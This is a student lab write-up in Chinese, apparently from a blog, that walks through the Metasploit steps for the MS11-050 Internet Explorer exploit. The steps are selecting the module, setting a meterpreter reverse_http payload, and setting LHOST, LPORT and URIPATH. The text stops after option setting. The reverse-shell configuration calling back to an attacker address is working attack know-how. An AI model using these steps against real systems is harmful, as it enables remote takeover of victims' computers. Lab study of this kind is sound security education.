实验过程

    • 使用命令msfconsole命令进入控制台
    • 20145339 Exp5 MS11_050
    • 使用命令search ms11_050查看针对MS11_050漏洞的攻击模块
    • 20145339 Exp5 MS11_050
    • 确定相应模块名之后,我们使用该模块。使用命令 use exploit/windows/browser/ms11_050_mshtml_cobjectelement进入模块
    • 使用命令info查看该模块的具体信息
    • 20145339 Exp5 MS11_050

    • 设置paylaods,我们选择了windows/meterpreter/reverse_http该payload会返回一个遵循http协议的shell,我们以此来获得目标主机系统权限。使用命令set payloads windows/meterpreter/reverse_http
    • 20145339 Exp5 MS11_050
    • 使用show options 查看具体参数设置
      20145339 Exp5 MS11_050

    • 设置其相关参数

      set LHOST 192.168.1.104 
      set LPORT 5339
      set URIPATH 20145339RX
    • 20145339 Exp5 MS11_050
    •  

相关文章:

  • 2021-10-28
  • 2021-07-10
  • 2021-04-21
  • 2021-08-31
  • 2021-10-28
  • 2021-12-30
猜你喜欢
  • 2021-09-05
  • 2021-09-26
  • 2021-12-03
  • 2021-10-08
  • 2021-12-12
相关资源
相似解决方案